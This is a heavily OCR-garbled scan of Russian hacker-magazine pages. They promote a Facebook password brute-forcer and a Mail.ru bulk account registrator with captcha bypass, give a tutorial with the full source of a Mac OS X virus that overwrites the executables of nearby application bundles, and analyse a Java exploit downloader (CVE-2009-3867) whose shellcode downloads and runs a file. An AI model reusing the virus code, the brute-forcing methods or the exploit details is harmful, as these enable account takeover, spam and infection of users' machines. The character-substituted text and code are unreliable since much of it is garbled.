Автор: 2бег ВіІ Уа 

Представляю твоему вниманию замечатель- 
ный брут социальной сети РасеЬоок.сот от 
мембера дгаЬЬегг.сот Ідеі ВіІѴа. 
Возможности проги: 

• поддержка 30СК34 /30СК35 ; 

• отображение подробной статистики 
(бэды, гуды, РРЗ , ошибки); 

• режим брутфорса «один логин + 
список паролей» (не рекомендует- 
ся, так как происходит блокировка 
аккаунта) ; 

• режим брутфорса один пароль + 
список логинов; 

• режим брутфорса по списку 
«логин ; пароль» ; 

• режим брутфорса по списку логинов 
и списку паролей. 

Тесты брутфорса впечатляют: успешное 
нахождение валидного аккаунта достига- 
ется при переборе без прокси после 1 0 000 
попыток. 

Автор с удовольствием прочитаеттвои поже- 
лания и замечания в топике дгаЫэегг.сот/ 
зЬоѵѵіЬ геас!.рНір?1:=26298 . 




Регаем таіі.ги 

Программа МаіІ.ги Реді$+га+ог4 
ОС: ѴѴіпсіоѵѵз 2000/ХР/2003 
5егѵег/Ѵі$*а/2008 5егѵег/7 
Автор: 2сІе2 ВіІ Уа 

Еще одна полезнейшая программа от 
Ідеі В і I Уа — регистратор мыл на сервисе 
таіі.ги (домены таіі.ги, Ьк.ги, Іізі.ги, 
іпЬох.ги). 

Прога может работать как с ручным вводом 
капчи, так и автоматически через сервис 
анти капчи ( апіідаіе.сот ). 

В главном окне ты сможешь выбрать метод 
генерации логина: 

• генерировать из случайных символов 
(логин определенной длины); 

• генерировать псевдочеловечный логин 
(более похож на настоящий); 

• регистрировать логины из файла (записи 
в файле должны иметь формат вида «ло- 
ги н (Э домен»), 

В настройках программы ты сможешь 
выбрать следующие опции регистрации 
мыльных аккаунтов: 

• дата рождения (выбрать одну для 
всех или поставить случайный вы- 
бор) ; 

• контрольный вопрос; 

• пол; 

• домен (таіі.ги, Іізб.ги, Ьк.ги, 
іпЬох . ги) ; 

• пароль (один для всех или случай- 
ный) ; 

• использование антикапчи (вписать 
ключ) ; 

• использование прокси (НТТР, 
30СК34 или 30СК35 ) ; 

• опция удаления прокси, если для 
нее наступил лимит регистраций; 

• создание «Моего Мира»; 

• использование имен и фамилий 
(имена берутся из файла паше . бхб , 
фамилии - из іашііу . бхб ) ; 

•загрузка аватара (берутся в 
случайном порядке из папки . / 
аѵабагз ) . 

После завершения работы утилиты ты смо- 
жешь увидеть все свои свежезареганные 
аккаунты в файле ассоипіз.іхі в формате 
«етаіійсіотаіпщаззѵѵогсі». 

За обновлениями и помощью заходи 
на официальную страничку програм- 
мы аѵІиб.ги/201 0/0 9/2 7/та іі-ги- 
гедізІгаІог-4.Ыт . т 
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МАІЛЛ/АРЕ 



ВИРУС 

И РОК 

У 



СОВРЕМЕННАЯ МАЛВАРЬ ДЛЯ МАО? НЕ МИФ, А ПРАКТИКА! 

Много ли ты слышал о вирусах в Мае 08 X? А ведь они есть. Среди вирей, 
троянов и прочей нечисти, созданной для этой платформы, постоянно 
появляются новые экземпляры. Как они работают? Какие уязвимости 
системы используют? На эти вопросы мы и попытаемся ответить. 



История вопроса 

Операционная система Мае Сіаззіс (то есть, любая версия Мае 
05 до 10-й, Мае 05 X) просуществовала довольно долго: от 
выпуска первой версии в 1984 до появления первой десктоп- 
ной версии Мае 05 X в марте 2001. За это время было создано 
немало вредоносного программного обеспечения, включая 
достаточно опасные вирусы, такие как, например, пѴіг, появив- 



шийся в 1987 году и создавший маководам немало проблем. 
Ситуация еще более усложнилась после публикации исходников 
этого виря, поскольку появилось множество его модификаций. 
Все они поражали бинарные исполняемые файлы Мае 05, патча 
таблицу переходов жертвы. 

Конечно, Арріе не осталась в стороне, и в систему были внесены 
некоторые изменения, ограничивающие возможности распро- 
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Ьоай сотішпй 12 

сгпгі ІС.ШШНКЕАО 
сщізіге 30 

і Іаѵог і 386_ТНРЕ А0_5Т АТЕ 
сои пі І336_ТНРЕА0_8Т АТЕ_С0ШТ 

еах 0x00000900 еЬх ѲхѲ00000Ѳ0 есх 0x00000000 есіх 0Х000Ѳ0Ѳ0Е 

есіі 0X00000000 езі 0X00000000 еЬр 0X00000000 €ЗР 0X00000006 

55 0X0000001! ѲГ‘ 1од5 0X00000000 СІр 0Х000000Ѳ0 С5 0X0000001' 

0X0000001! в® 0Х0090ѲѲ1! 7$ 0X00000000 д$ 0X00000006 

тасіізегз-согприіег :~/ѵх/тасИотап тасизег$ ^ 1 1 е I® 

Із: МсісН-О ехесиіаЫе І386 

шси5ег5-сотриіег:~/ѵх/тосИіотш - і тасизегі оЪооі -Иі І5 

Із: 

Ііос(і Неасіег 

ніадіс срибуре сризиЬЗДе !іІеѣуре пстсіз $ігео!стсі$ !1адз 

0х!еес1!асе 7 3 2 13 1620 0x00000035 



ЬС.иШХТНВЕАР ИЗ дампа оіооі 



странения таіѵѵаге. Может быть, наиболее значимым был отказ 
от технологии автозапуска с СО. В настоящее время аиіогип’ы не 
поддерживаются в Мае 05 X ни для съемных носителей, ни для 
компакт-дисков. 

Стоит сказать, что Арріе активно закрывает дыры в Мае 05 X и 
сейчас. Совсем недавно вместе с очередным апдейтом системы 
были изменены права доступа к папке /Арріісаііопз. До этого 
файлы в ней могли быть изменены любым юзером. Так что код 
вируса, исполняющийся от имени пользователя, мог свободно 
заражать приложения в этой папке. А в ней сидят такие часто 
используемые проги, как іТипез или іМаіІ. 

С ростом популярности продукции Арріе растет и внимание злов- 
редописателей к этой платформе. Ведь чем больше пользовате- 
лей у системы, тем больше простор для их поделок. Во многом 
эта ситуация подогревается просто-таки фанатичным неверием 
большинства пользователей Мае 05 Х/Ю5 в уязвимость своей 
системы. 

Так, например, какое-то время по интернету ходил ]рд-файл с 
исполняемым файлом Мае 05 X внутри. Ріпбег Мае 05 X не пока- 
зывает расширения файлов. 

Поэтому счастливый пользователь кликал на картинку, запуская 
вредоносное приложение, а особо удачливые даже вводили 
админский пароль для повышения привилегий, когда некоторые 
модификации этого трояна его запрашивали. 

В общем, малварь на маках есть, и она активно размножается. 
Чтобы понять, какие особенности системы эксплуатируются, рас- 
смотрим в деталях, что же такое 

представляют из себя исполняемые файлы Мае 05 X, и как 
зловредам удается их заражать, заставляя систему выполнять 
свой код. 

МасН-0 формат 

МасЬ-0 — это формат исполняемых, объектных файлов и дина- 
мических библиотек в Мае 05 X. Возник он как замена устарев- 
шему а.оиі. Изначально этот формат 

использовался в ядре МасЬ (было такое микроядро, вроде и 
сейчас энтузиасты четвертую версию допиливают). Позже он 
перекочевал в ЫеХТ5ТЕР. Ну а Мае 05 X, которая возникла как 
логическое продолжение развития системы ЫеХТ5ТЕР, уна- 
следовала этот формат от нее. Кстати, О N ІІ/Н и гсі , которая также 



выросла из Масб, использует привычные линуксовские ЕЕР’ы, а 
не МасЬ-О^есІ’ы. 

МасЬ-0 файлы чем-то напоминают попсовые РЕ, но при этом 
они имеют множество оригинальных решений. Так, напри- 
мер, эти бинарники могут содержать код сразу для несколь- 
ких платформ. Скажем, для процессоров РоѵѵегРС и Іпіеі. ОС 
сама выберет машинный код, который следует исполнять. 
Хотя РоѵѵегРС-машины уже не так популярны, в компилято- 
рах от Арріе до сих пор есть опция, позволяющая генерить 
код под эту платформу. Мы здесь будем рассматривать только 
файлы для Іпіеі’овских процессоров, так что если у тебя под 
рукой каким-то чудом оказался РоѵѵегВоок, придется курить 
маны самостоятельно. 

Формат МасЬ-0 является открытым (в отличие, например, оттого 
же РЕ, тщательно и тщетно оберегаемого М іегозобі). Вся инфор- 
мация по этому формату может быть найдена на официальном 
сайте Арріе. Более того, описания основных структур доступны 
в стандартных заголовках (например Іоабег.Ь), что значительно 

Сегменты и секции МасН-О 

Неасіег 
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#ітрогб <Сосоа/Сосоа . Н> 

іпб таіп(іпб агдс , сііаг *агдѵ[]) 

{ 

// Дадим о себе знать 

ЫЗЬод ( @ " !!!!!!!!!!!!!!!!!!!!!") ; 

ЫЗЪод ( @ " ! ! ! I ' т Неге !!!!"); 

ЫЗЬод ( @ "!!!!!!!!! Н !!!!!!!!!!" Щ 
ЫЗРіІеМападег * бгп = 

[ЫЗРіІеМападег бебаиІбМападег ] ; 

/ / Папка нашего бандла 
ЫЗЗбгіпд * Ьипб1е_Р1бг = 

[ [ЫЗВипбІе шаіпВипбІе] ЪипсИеРабН] ; 

/ / Папка , в которой лежит наш арр 
ЫЗЗбгіпд * оиг_б1бг « 

[Ъипс(1е_б1сІг збгіпдВуАррепбіпдЗбгіпд : @ ; 

// Имя текущего бинарника 
ЫЗЗбгіпд * сиггепб_ехесибаЫе = 

[ [ЫЗБісбіопагу бісбіопагуМібЬСопбепбзОбЕіІе : 

[Ьипб1е_б1бг збгіпдВуАррепсІіпдЗбгіпд : 

/Сопбепбз/Іпбо.ріізб" ] ] обд есбЕогКеу : 

@ "СЕВипсНеЕхесибаЫе" ] ; 

// Список наших соседей : ) 

ЫЗАггау * аррз = 

ѵЧ||[бт бігесбогуСопбепбзАбРабІі: оиг_б1с!г] 
біІбегебАггауІІзіпдРгебісабе : 

[ЫЗРгесІісабе ргебісабеѴЦ-бІіРогтаб : 

@ " зеіб ЕЫБЗШТН ' . арр 1 " ] ] ; 

бог (ЫЗЗбгіпд * арр іп аррз) { 

±1 ( 

[бт біІеЕхізбзАбРабЬ : 

[оиг_б1бг збгіпдВуАррепбіпдРогшаб : 

@ " /%@/Сопбепбз/МасОЗ/о1б" , арр]] } 

) 



сопбіпие; // Тут мы уже когда-то были 

ЫЗБісбіопагу * р1ізб_с(ісб = 

[ЫЗБісбіопагу бісбіопагуМбНСопбепбзОбЕіІе : 
[оиг_б1бг збгіпдВуАррепсІіпдРогтаб : 

@ " /%@/Сопбепбз/Іпбо .ріізб " , арр] ] ; 

ЫЗЗбгіпд * арр_ехесибаЫе = 

[р1ізб_бісб обд есбЕогКеу : @ м СРВипб1еЕхесибаЫе" ] ; 

/ / Переименуем бинарник приложения-жертвы 
[бш тоѵеІбетАбРабІі : 

[оиг_б1бг збгіпдВуАррепбіпдЕогтаб : 

@ " /%@/Сопбепбз/МасОЗ/%@ " , арр, арр_ехесибаЫе] 
боРабЬ: [оиг_б1с(г ЗбгіпдВуАррепсІіпдРогтаб: 
/%@/Сопбепбз/МасОЗ/о1й" ] еггог: піі] ; 

// И записываем себя на его место 

[бш соруІбешАбРабІі : 

[Ьипб1е_б1бг ЗбгіпдВуАррепсІіпдРогтаб : 

/Сопбепбз/Мас03/%@" , сиггепб_ехесибаЫе] 
боРабЬ: [оиг_б1бг 

ЗбгіпдВуАррепсІіпдРогтаб : 

@ " /%@/Сопбепбз/МасОЗ/%@ " , арр, 

арр_ехесибаЫе] 
еггог: піі] ; 

} 

// Передаем управление оригинальному файлу 
зузбеш ( [ [ [ [ЫЗВипбІе таіпВипсІІе] ЬипбІеРабЬ] 
збг іпдВуАррепбіпдЗбг іпд : 

@ " /Сопбепбз/МасОЗ/оІб &"] сЗбгіпд] ) ; 



экономит время при создании тулов, работающих с Масб-0. Итак, 
файлы этого формата содержат три основных раздела: 

• В самом начале располагается заголовок МасЬ-0 файла, кото- 
рый содержит базовую информацию о нем. Например, целевую 
аппаратную платформу. Сразу скажу, 

что числа в файле хранятся в формате целевой платформы. То 
есть, если это Іпіеі — то иіпі32 так и лежит в ЫШе Епсііап. 

Структура заголовка МасІі-0 из Іоасіег.И 

збгисб тасЬ_Неас1ег 

{ 

иіпб32_б тадіс; // признак Масй-0 
сри_буре_б срибуре ; 
сри_зиЬбуре_б сризиЬбуре; 
иіпб32_б бііебуре; 

иіпб32_б пстсіз ; // Число команд загрузки 

иіпб32_б зігеобстсіз ; // и их размер 

иіпб32_б біадз; 

} ; 

• За заголовком следуют команды загрузки. Число и размер их 
указаны в заголовке. Команды эти бывают различных типов и 
выполняются загрузчиком при подготовке процесса к исполне- 
нию. Основные команды, о которых имеет смысл здесь говорить, 



это «І_С_5Е6МЕІ\ІТ» и «ЕС_ІІ N ІХТН РЕАО». Первая предназначена 
для инициализации области виртуальной памяти и позволяет 
устанавливать атрибуты ее страниц, а также подгружать в них 
данные из файла. Каждый сегмент может состоять из нескольких 
секций, которым соответствуют непрерывные участки файла. А 
команда «КМЛМІІХТНРЕАВ» создает поток со стеком и инициа- 
лизирует регистры процессора для него. В том числе инициа- 
лизирует она и ІР, задавая точку входа для этого потока. Кстати, 
насколько я знаю, ЮА до сих пор не умеет определять реальную 
точку входа Масб-0, а просто принимает за нее первую команду в 
сегменте кода. Учитывая, что именно ЮА используется вирусны- 
ми аналитиками чаще всего, этот недостаток на руку вирусописа- 
телям. 

Описание І_С_5Е6МЕМТ из ІоасІег.Іі 

збгисб зедтепб_сошшап<і 

{ 

иіпб32_б стсЗ; // Ісі команды 

иіпб32_б стсізіге; // И ее размер (вместе с Ісі) 

сбаг зедпаше[1б]; // Например « ТЕХТ» 

иіпб32_б ѵтасісіг; // Начало сегмента в ѴМ 
иіпб32_б ѵшзісе; 

иіпб32_б бііеобб; // Смещение данных сегмента 
иіпб32_б бііезісе; 
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С] Сойеймоигм* 
ѵ [_ Ггатютгкі 
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* Кегоигссз 

► й ѵегеіолі 

□ ІПІО.рКіІ 

▼ МдсОБ 

■ іТил*і 

[]» РкдіпГо 

▼ О] Кезоигсеі 
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► СИ ОѵКЬЛріО) 
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► Сі Ргегкп.ірігоі 

► Сегтал.ірго; 

► _ Ііа1і4л.ірп»і 

Структура каталогов в бандле 



ѵт_ргоЦ_Ц тахргоС ; 
ѵт_ргоЦ_Ц іпіЦргоС; 
иіпЦ 32 _Ц пзесСз; 

/ / Число секций в этом сегменте 
иіпЦ 32 _Ц Оадз; // Атрибуты страниц памяти 

} ; 



зСгисС зесСіоп 
{ 

сііаг зесбпате[ 1 б 
сііаг зедпате[ 1 б] 
иіпб 32 _б аскЗг; 
иіпб 32 _б 
иіпб 32 _б 
иіпб 32 _б 
иіпб 32 _б 
иіпб 32 _б 
иіпб 32 _б 
иіпб 32 _б 
иіпб 32 _б 



/ / Тут все понятно 



з 1 2 е ; 

оНЁзеЦ; // Смещение секции в файле 

аіідп; 

геІоИі: ; 

пгеіос ; 

іііадз ; 

гезегѵебі ; 

гезегѵеб 2 $ 



} ; 



• За командами загрузки следует собственно тело модуля: код, 
данные, таблица переходов и так далее Получить подробную 
информацию о заголовках и командах загрузки для бинарника 
можно с помощью утилитки оіооі (очень полезная, на мой взгляд, 
штука — много чего умеет]. Каждый МасЬ-0 сегмент, как видно 
из описания структуры, имеет имя. Так код программы будет рас- 
полагаться в сегменте « ТЕХТ», а данные — в сегменте с именем 

« йАТА». 



Бинарный инжект 

Зная, что собой представляет исполняемый файл Мае 05 X, попробу- 
ем разобраться, как можно встроить свой код в собранный бинарник 
Мае 05 X. Подкорректировав значение регистров в команде «І_С_ 
ІЛМІІХТНПЕАО», можно изменить точку входа, если это будет нужно. 

Ну а как разместить сторонний код в МасЬ-0 файле? Естественное 

желание — добавить еще одну секцию к сегменту « ТЕХТ», в конец 

файла дописать свой код и загрузить его в добавленной секции. 
Меняем точку входа на начало нашей секции в виртуальной 
памяти и... кажется, тут есть одно «но». Придется парсить все 
команды загрузки и определять свободную область виртуалки, 
в которую мы можем загрузить свою секцию. Может получиться 
так, что свободного пространства будет еще и недостаточно, ведь 
сразу за сегментом кода, как правило, следуют данные, а переме- 
щать сегменты — это уже задачка посложнее. В принципе, такой 
подход можно воплотить в жизнь, но это достаточно трудоемко. 
Фактически нужно реализовывать в вире немалую часть работы 
загрузчика. Есть ли реальные вири, которые так поступают, я не 
знаю. 

Кроме сегментов « ТЕХТ» и « йАТА» есть еще « РАОЕХЕРО», 

чтение и запись в который запрещены, и располагается он в 
виртуальной памяти процесса по нулевому адресу. Создается 
этот сегмент, состоящий всего из одной страницы, специ- 
ально, чтобы разыменование нулевого указателя приводило к 
исключению. Вообще сегмент этот опционален, но реальный 
бинарник, в котором его бы не было, мне не попадался. Для 

сегмента « РА6Е2ЕР0» ТІеоіТзеІ: и біезіге равны нулю. То есть, 

данными из файла он не инициализируется. Однако, если ты 
поменяешь эти значения, то, дописав в конец файла свой код, 
можешь подгрузить его в нулевую страницу виртуалки. Изменив 
атрибуты доступа к памяти сегмента « РАѲЕ2РЕР0» и поме- 

тив ее как исполняемую (подняв Р- и Х-биты), а также изменив 
«І_С_иі\ІІІХТНРЕАВ», можно заставить свой код исполняться при 
старте приложения. Так, видимо, и было еще пару лет назад. 

Во всяком случае, в сети можно найти статьи с конференций 
ВІаскНаТ описывающие эксплуатацию этой уязвимости. Но, 
когда я пытался проделать подобный трюк, как только я поме- 
чал память исполняемой, она вместо инициализации из файла 
заполнялась мусором. 

В других случая код успешно загружался в нулевую страницу, но 
попытка его исполнить ни к чему хорошему не приводила. В общем, с 
наскока вписаться в произвольный МасЬ-0 не так легко, как кажется. 
Пожалуй, еще об одном способе я не сказал. Если есть достаточно 
большие пустоты в конце секций кода (из-за выравнивания на 4Кдля 
оптимизации маппинга в страницы памяти), то можно попытаться в 
них разместить свои фрагменты кода. Но гарантии, что у тебя в рас- 
поряжении будет достаточно неиспользуемого пространства, никто 
не даст. Можешь потренироваться с написанием компактного кода на 
досуге :), а мы рассмотрим более простые способы. 

Бандлы Мае 05 X 

Если в виндах ресурсы лежат прямо в экзешнике, то в Мае 05 X при- 
ложения организованы в так называемые бандлы (ЬаипсІІез). 

Бандл — это дерево каталогов с определенной структурой, в которых 
располагаются исполняемые файлы, метаданые приложения и его 
ресурсы. Для пользователя в Еіпбег’е бандл выглядит единым эле- 
ментом, кликнув по которому, юзер может запустить приложение. 
Можно видеть, что бандл — это каталог с расширением .арр, в кото- 
ром таится папка Сопіепіз. А в папке Егатеѵѵогкз, как нетрудно 
догадаться, лежат фреймворки, которые поставляются вместе с при- 
ложением. Кстати, фреймворки (аналоги сІІГек) тоже организованы в 
бандлы. В папке Мас05 лежат бинарники уже знакомого тебе формата 
МасЬ-О, а в ресурсах (папка РеБоигсез) всякие иконки, звуки и так 
далее. В файле ІпФ.рІізІ: находится описание приложения. 

Вот его пример: 
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Компилируется... 






<?хш1 ѵегзіоп=»1 . О» епсос!іпд= "17ГЕ-8 " ?> 
сШОСТУРЕ ріізк РЦВЫС " -//Арр1е//БТБ РЫЗТ 1.0//ЕЫ" 
"ЬЦЦр: / /тт. арріе . сош/ВТБз/РгорегЕуЪізЕ-1 . О . сІЕс!" > 
<р1ізЕ ѵегзіоп=" 1 . 0"> 

<с!ісЦ> 

<кеу>СЕВипсі1еВеѵе1оршепЕКедіоп</кеу> 

<зкгіпд>Епд1ізЬ.</зкгіпд> 

<кеу>СЕВипсі1еЕхесикаЫе</кеу> 

<зкгіпд>Вешо</зкгіпд> 

<кеу>СЕВип<і1еІсопЕі1е</кеу> 

<зкгіпдх/зкгіпд> 

<кеу>ЕЗМаіпВіЬЕі1е</кеу> 

<зкгіпд>МаіпМепи</зкгіпд> 

<кеу>№Ргіпсіра1С1азз</кеу> 

<зкгіпд>ЕЗАрр1ісакіоп</зкгіпд> 

</сііск> 

</р1ізк> 

Это — обычный хті-файл, читать и изменять его довольно 
легко. Однако в Мае 05 X существуют специальные утилиты и 
библиотеки для работы с файлами этого формата. Нас здесь 
интересует поле СЕВипсІІеЕхесиІаЫе. Это — имя бинарника из 
папки Мас05. При запуске приложения именно ему будет пере- 
дано управление. Так что, если кто-то захочет заразить бандл, 
то делается это достаточно просто. Нужно подменить файл, на 
который ссылается СРВипбІеЕхесиІаЫе, а старый переимено- 
вать, чтобы иметь возможность выполнить его, когда все твои 
дела будут закончены. В общем «просто праздник какой-то», и 



с сегментами возиться не нужно. А еще недавно, когда доступ 
к папке /Арріісаііопз был открыт, код, исполняемый от имени 
непривилегированного пользователя, свободно мог таким нехи- 
трым способом заражать большинство приложений Мае 05 X! 
Сейчас для этого нужно поднять привилегии с помощью, напри- 
мер, вызова АиіЬогігаІіопСгеаІе из Зесигііу-фреймворка. 

Ріо, как уже было сказано, пользователям Мае 05 X вообще 
свойственна вера в совершенство продукции Арріе и невозмож- 
ность существования малвари под нее, поэтому не исключено, 
что юзер согласится и на админскую авторизацию. 

Кодим бандл-вирь 

РІапишем для примера небольшой вирь, который демонстрирует 
возможность заражения бандла с подменой исполняемого при 
запуске файла. 

Поступим следующим образом: просмотрим все приложения, 
что лежат в одной папке с нашим вирем, положим вместо ори- 
гинального исполняемого файла свой, а старый переименуем в 
«оШ», и, когда все будет закончено, передадим управление ему. 
Полный код примера ты сможешь увидеть на соответствующей 
врезке. 

Оиіто 

Мой вирь, как ты легко можешь убедиться, работает и заражает 
приложения, которые находятся с ним в одной папке. Открытая 
структура приложений в Мае 05 X делает их уязвимыми, но, как 
и в любой *піх-системе, одним из главных орудий борьбы со 
зловредами в Мае 05 X является правильное распределение 
прав в файловой системе. Удачного компилирования! ц-ц 
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КОВЫРЯЕМ ПОЛНОЦЕННУЮ ЖА-МАЛ ВАРЬ 

Во всех моих предыдущих статьях разбирались РЕ-файлы, поэтому я 
решил несколько разнообразить рубрику и сделать обзор вредоноса, 
написанного на Жа. Почему именно на Жа? 



Дело в том, что они реально существуют, а внимания им уделя- 
ется довольно мало. По статистическим данным ЛК, в настоящее 
время их очень и очень много в интернете. 

А как же они распространяются и почему приобрели популяр- 
ность? Основной способ их доставки до пользователя — загруз- 
ки бгіѵе-Ьу. Напомню, что загрузка бгіѵе-Ьу — это метод, который 
позволяет малварописателям запустить на компьютере жертвы 
конечную малварь при помощи целой цепочки вредоносов, рас- 
положенных в вебе. В эту цепочку входит редиректор, скрипто- 
вый загрузчик и эксплойт. Как правило, последний загружает 
какой-нибудь бэкдор или троянец, ворующий конфиденциаль- 
ные данные. А стали они популярны, по-видимому, из-за того, 
что были открыты критические уязвимости, с помощью которых 
можно легко загрузить файл по ссылке и исполнить его. Рост 
популярности платформы баѵа по всему миру также сыграл не 
последнюю роль. В качестве экземпляра для разбора я выбрал 



баѵа-загрузчик, работающий на основе эксплойта, использую- 
щего уязвимость СѴЕ-2009-3867. Может показаться, что раз уж 
эта дыра не свежая, то и угроза совсем не актуальная. Однако 
это не так — самые последние даунлоадеры на баѵаЗсгірІ скачи- 
вают именно такую баѵа-малварь. По-видимому, пользователи 
не спешат апдейтить 6РЕ... 

Для начала разберем, как же наш зверек запускается. Или что 
его запускает. В подавляющем большинстве случаев это дела- 
ет Ыті-страничка или скрипт, генерирующий Ыті-код. Чтобы 
установить и запустить баѵа-апплет, применяются тэги <аррІе1> 
или <обіес1>. Основные параметры первого тэга это агсбіѵе 
(указывает на местоположение )аг-архива) и собе (указывает 
на Ява-класс, который следует запустить). Данные из ЫтГки 
в апплет можно передавать с помощью тэга <РАРАМ>. Далее, 
при разборе самого зловреда, я покажу, как используются дан- 
ные ‘баіа’, передаваемые в рассматриваемой страничке. Для 



ХАКЕР 02 [145) 201 1 



► 073 







наглядности я отметил все описываемые вещи на скриншоте. А 
именно: 



Рис. 3 Работа с декомпилированным АсІдгесІУ.сІазз под 
отладчиком 





• агсЬіѵе= ' Сшр/риі . даг ' 

• сос1е= ' сіеѵ . з . АсідгесіУ ' 

• <рагаш паше= ' (іаСа ' ѴАЫІЕ= ' ЬССр : //****. сот/ 

з4/1 . рДр? . . . 

Итак, )аг-файл запустился. Как же его теперь разбирать? Как 
вообще устроены ^ѵа-программы? Сам )аг-файл — всего лишь 
2ІР-архив, он является контейнером. Его можно распаковать 
при помощи практически любого архиватора, что я и сделал. 
Внутри него содержатся сіазз-файлы. А это и есть то, что нас 
интересует — скомпилированные ^ѵа-исходники. Распаковав 
контейнер, получаем три таких класса и манифест. Я сразу обра- 
тил внимание на АбдгебУ.сІазз, вспомнив, что параметр собе 
тэга <аррІеІ> содержит именно это значение. Кстати, как заметит 
внимательный читатель, там содержится беѵ.з.АбдгебУ, а не про- 
сто АбдгебУ. Все дело в том, что точки представляют собой раз- 
делитель между папками. Таким образом, интерпретатор, обра- 
батывая тэг, запомнит, где находится необходимый ему класс, 
преобразуя переменную в путь на диске. 

Так как .сіазз — скомпилированный объект, содержащий байт- 
код, нам необходимо превратить его в то, что можно анализиро- 
вать. Я использовал бесплатный баѵа-декомпилятор 6А0. Как ни 
странно, но у меня ушло немало времени, чтобы скачать его из 
интернета (притом, что он является наиболее популярной про- 
граммой для этих целей, которая, к тому же, ничего не стоит). 
Применив его на АбдгебУ.сІазз, на выходе я получил декомпили- 
рованный, практически исходный, код. Открыв полученный файл 
в Ніеѵѵ, я сразу же заметил две большие строки, состоящие из 
символов соответствующих байтов шестнадцатиричной системы 
исчисления. 

По-видимому, это шеллкоды, но что-то начальные байты уж 
очень странные! Например, преобразовав последовательность 
А000СА469Р в инструкцию, я получаю ппоѵ а I, [0x9 Р46СА00] . 

Адрес располагается в пространстве ядра ОС ѴѴіпбоѵѵз и обра- 
щение к нему из третьего кольца вызовет исключение. Весьма 
сомнительно, что так оно и задумывалось. 

Что ж, скачаем бесплатную графическую среду для разработки 
баѵа-приложений ЫеіВеапз — она прекрасно подходит и для 
отладки. После небольших танцев с бубном я создал проект, и 
в результате мне удалось заставить отрабатывать полученный 
декомпилированный файл. Для этого пришлось аккуратно пере- 
носить данные из декомпилированного файла, модифицируя 
их. Отлаживая код, я сходу обнаружил его замусоривание. 
Во-первых, это инициализация произвольных строковых пере- 
менных, которые не используются в дальнейшем. На скриншоте 
видны такие строки — это з2, з4, з8 и так далее. А вот строка 
зЗ хоть и кажется трэшевой, но это не так. Пройдя чуть ниже 



по сорцу, видим, что переменная зб получается из зЗ путем ее 
«переворачивания задом наперед», что реализуется методом 
геѵегзе. Таким образом, из аіаб получается баіа (Гурд не хочет 
делать кривые зеркала! Позовите Абажа и Апулаза! — прим, 
ред.). В данном сэмпле все используемые строковые пере- 
менные получаются именно таким образом. А это и есть второй 
метод, усложняющий анализ и понимание кода. Безымянные 
идентификаторы также не добавляют скорости анализа. Мне все 
время приходилось возвращаться к начальной функции, чтобы 
посмотреть, что такое з21 , з25 и так далее. 

Далее, анализируя код, я натыкаюсь на вызов функции 
деіРагаппеІег со значением баіа в качестве аргумента. Ее роль, 
как можно понять из названия, заключается в выдаче значе- 
ния соответствующей переменной, которое было указано в тэге 
<РАРАМ> Ыт [-документа. Я упоминал об этом в начале статьи. 
Как видно из первого скриншота, там содержится некий игі. 
Выглядит он следующим образом: «Ьир://********.сот/з4/1. 
рбр?сІе5егіа(І2е=ее&і=». Таким образом, в рбр’шку, вероятно, 
передаются два параметра: сіезегіаііге, со значением ее и 
пока что пустое і. Весьма любопытно, что дальше проверяет- 
ся соответствие адреса до вопросительного знака и значение 
безегіаііге. Делается это следующим образом: 

ЗСгіпд з27 = деВРагатеВег ( "сІаВа" ) ; 
сЬаг ас [ ] = {'?'}; 

іпВ і = 0; 
іпВ | = 0; 

Щг(; з2 7 . сАагАВ ( і ) != ас [ 0 ] ; і + +) 

3 += з2 7 . сЬагАВ ( і ) ; 



3 + = 7 ; 

3 %= 256; 

ЗВгіпд з28 = ІпВедег . ВоНехЗВгіпд ( з ) ; 

ІЕ ( з2 7 . іпсІехОЕ ( (пем ЗВгіпдВиіІсІег ( ) ) . аррепсі ( 

" с1езегіа1І2е= " ) . аррепсі ( з2 8 ) . ВоЗВгіпд ( ) ) == -1) 

геВигп; 

Как видно из кода, на основе строки до знака ? производится 
подсчет контрольной суммы, которая сравнивается со значением 
первого аргумента. В случае неудачи зловред прекращает свою 
деятельность. 

После этого происходит получение текущей версии ^ѵа, в зависи- 
мости от которой выбираются разные шелл-коды. Кстати, шелл-код 
также подвергается «реверсу», к нему приклеивается II РЕ, про 
который я писал в предыдущем абзаце, и в дальнейшем преобра- 
зуется в последовательность байтов. Помимо этого в конец адреса 
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Рис. 4 Фрагмент декомпилированного АсІдгесІѴ.сІазз, содержащий вызов уязвимой функции 





Рис. 5 Фрагмент доаі-файла, содержащего шеллкод, выдранный из .Ъѵа-вредоноса 



добавляется число, так что параметр і не остается пустым. Все это 
логично завершается вызовом уязвимой функции деіБоипсІВапк. 

Ей в качестве аргумента передается специально сформированный 
адрес (см. рис. 4). 

Текущая версия Чаѵа запрашивается с помощью Бузіет. 
деіРгорегІу Цаѵа.ѵегзіоп). Генерируемый игі, как видно из иллю- 
страции, заполняется целой кучей слэшей и дополняется стро- 

«2еи$ был уличен в большой 
любви к российским 
системам дистанционного 
банковского обслуживания 
(ДБО)» 

кой Т.%7.%7.%7.%7.%7.%. А предваряется он префиксом «Ошибка! 
Недопустимый объект гиперссылки!». Суть эксплойта заключается в 
передаче функции деіБоипсІВапк адрес именно такого вида, чтобы 
это впоследствии вызвало выполнение шеллкода. 

А теперь перейдем непосредственно к машинному коду, который 
будет осуществлять вредоносную деятельность. Как я уже писал, 
шеллкод специально подготавливается и располагается в памя- 
ти определенным образом. Также не забываем, что он содержит 
дополненный игі, который извлекается из поля баіа тэга <РАРАМ>. 
Написав небольшую программку на С, я в итоге скинул весь код на 
диск для последующего разбора. Чтобы можно было удобно с ним 
играться в ЮА, я «вклеил» шеллкод в доаі-файл. На картинке (рис. 
5) можно посмотреть, что у меня в конечном счете получилось. 
Видны названия импортируемых библиотек и функций, а также 
игі, с которого будет выполняться загрузка. Среди функций самый 



большой интерес представляют 14 РЮоѵѵп ІоасІТоРі Іе и ѴѴіпЕхес. Сам 
код оказался крайне неинтересным и банальным. 

Вначале из РЕВ’а извлекается адрес модуля кегпе132. Затем в 
нем производится поиск точек входа функций І_оасИ_іЬгагуА и 
ОеіРгосАсІсІгезз, с помощью которых получаются адреса библиотеки 
игітоп.біі и функций ОеіТетрРаіЬА, ѴѴіпЕхес, I) РЮоѵѵпІоасІТоРіІеА. 
Ну и завершающий этап — скачка файла, его сохранение на диске 
и запуск. Вот это, собственно, и есть та составляющая, ради которой 
мастерился рассматриваемый зловред. 

И это не РоС, а действительно полноценная малварь, которая 
защищается от анализа и детектирования. В рассматриваемом 
